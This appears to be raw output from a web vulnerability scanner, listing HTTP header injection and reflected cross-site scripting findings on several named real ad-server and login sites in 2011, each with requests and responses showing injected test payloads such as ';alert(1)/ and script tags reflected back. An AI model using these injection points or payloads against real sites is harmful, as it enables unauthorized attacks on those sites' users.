1.1. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]
1.2. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]
2. Cross-site scripting (reflected)
2.1. http://ad.z5x.net/st [name of an arbitrarily supplied request parameter]
2.2. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]
2.3. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]
2.4. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]
2.5. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]
2.6. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]
2.7. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]
2.8. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]
2.9. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]
2.10. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]
2.11. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]
2.12. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [q parameter]
2.13. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [q parameter]
2.14. http://membersarealogin.com/index.asp [area parameter]
2.15. http://membersarealogin.com/index.asp [area parameter]
2.16. http://membersarealogin.com/index.asp [err parameter]
2.17. http://sh.webhire.com/Profiler/login.pfl [EMAIL parameter]
2.18. http://sh.webhire.com/profiler/login_page.pfl [CCC_DEST parameter]
2.19. https://www.ipredator.se/ [name of an arbitrarily supplied request parameter]
2.20. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [ZEDOIDA cookie]
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:880bd 44d2bd9e843;expires=Thu, 24 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=1;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "4229442-82ee-49ea76 Vary: Accept-Encoding X-Varnish: 1854305169 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=182 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:34 GMT Connection: close Content-Length: 1303 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',880bd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fmr |
GET /bar/v16-403/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:289bc fc3987e46b2;expires=Thu, 24 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFCap=1512B933,196008 ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=35 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:57 GMT Connection: close Content-Length: 6044 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',289bc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.z5x.net |
Path: | /st |
GET /st?ad_type=ad&ad_size Host: ad.z5x.net Proxy-Connection: keep-alive Referer: http://random.securep2p User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:14:33 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 24 Mar 2011 02:14:33 GMT Pragma: no-cache Content-Length: 4315 Age: 0 Proxy-Connection: close /* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:d3faf';alert(1)/ Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=1;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "4229442-82ee-49ea76 Vary: Accept-Encoding X-Varnish: 1854305169 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=182 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:34 GMT Connection: close Content-Length: 1323 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',d3faf';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,d3faf';alert(1) if(zzuid=='unknown')zzuid var zzhasA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:db1b2";alert(1)/ Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=211 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:05 GMT Connection: close Content-Length: 2066 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',db1b2";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,db1b2";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.rand ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:aeff4";alert(1)/ Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=1;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "4229442-82ee-49ea76 Vary: Accept-Encoding X-Varnish: 1854305169 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=183 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:33 GMT Connection: close Content-Length: 1323 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',aeff4";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,aeff4";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.rand ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:4e458';alert(1)/ Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=210 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:06 GMT Connection: close Content-Length: 2066 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',4e458';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,4e458';alert(1) if(zzuid=='unknown')zzuid var zzhasA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=1;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=790,3281,15;expires ETag: "4229442-82ee-49ea76 Vary: Accept-Encoding X-Varnish: 1854305169 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=188 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:28 GMT Connection: close Content-Length: 1320 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='6bb0b';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=6bb0b';alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=790,3281,15;expires ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=37 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:55 GMT Connection: close Content-Length: 2063 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='ae9f8";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=ae9f8";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.rand ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=790,3281,15;expires ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=36 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:56 GMT Connection: close Content-Length: 2063 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='45735';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=45735';alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fm.js |
GET /bar/v16-403/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=1;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=790,3281,15;expires ETag: "4229442-82ee-49ea76 Vary: Accept-Encoding X-Varnish: 1854305169 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=189 Expires: Thu, 24 Mar 2011 02:18:36 GMT Date: Thu, 24 Mar 2011 02:15:27 GMT Connection: close Content-Length: 1320 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='bb7b6";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=bb7b6";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.rand ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fmr |
GET /bar/v16-403/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:9cda0';alert(1)/ Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFCap=1512B933,196008 ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=36 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:56 GMT Connection: close Content-Length: 6064 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',9cda0';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,9cda0';alert(1) if(zzuid=='unknown')zzuid var zzhasA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fmr |
GET /bar/v16-403/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=790:286b2";alert(1)/ Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFCap=1512B933,196008 ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=36 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:56 GMT Connection: close Content-Length: 6060 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat=',286b2";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,286b2";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; zzhasAd=1; var zzDate = new Date(); var zzWindow; v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fmr |
GET /bar/v16-403/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008 Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=43 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:49 GMT Connection: close Content-Length: 6061 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='5d9d3';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=5d9d3';alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fmr |
GET /bar/v16-403/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008 Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=43 Expires: Thu, 24 Mar 2011 02:15:32 GMT Date: Thu, 24 Mar 2011 02:14:49 GMT Connection: close Content-Length: 6061 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='f6435";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=f6435";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; zzhasAd=1; var zzDate = new Date(); var zzWindow; v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://membersarealogin |
Path: | /index.asp |
GET /index.asp?area=e05df"><script>alert(1)< Host: membersarealogin.com Proxy-Connection: keep-alive Referer: http://membersarealogin Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDAQBSCBDB |
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:06:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4608 Content-Type: text/html Cache-control: private <html> <head> <title>Members' Area Login</title> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; background-color:#FFFFFF ...[SNIP]... <form action="/index.asp?step=2 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://membersarealogin |
Path: | /index.asp |
GET /index.asp?step=2&siteid= Host: membersarealogin.com Proxy-Connection: keep-alive Referer: http://membersarealogin Cache-Control: max-age=0 Origin: http://membersarealogin User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDAQBSCBDB |
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:08:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4613 Content-Type: text/html Cache-control: private <html> <head> <title>Members' Area Login</title> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; background-color:#FFFFFF ...[SNIP]... <form action="/index.asp?step=2 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://membersarealogin |
Path: | /index.asp |
GET /index.asp?area=&err Host: membersarealogin.com Proxy-Connection: keep-alive Referer: http://membersarealogin Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDAQBSCBDB |
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:06:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4606 Content-Type: text/html Cache-control: private <html> <head> <title>Members' Area Login</title> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; background-color:#FFFFFF ...[SNIP]... <font color=red>Invalid Login9c9bc<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sh.webhire.com |
Path: | /Profiler/login.pfl |
GET /Profiler/login.pfl?CCC Host: sh.webhire.com Proxy-Connection: keep-alive Referer: http://sh.webhire.com Cache-Control: max-age=0 Origin: http://sh.webhire.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JobIDs=; AccountID=726; Site=I; TestCookie=TRUE |
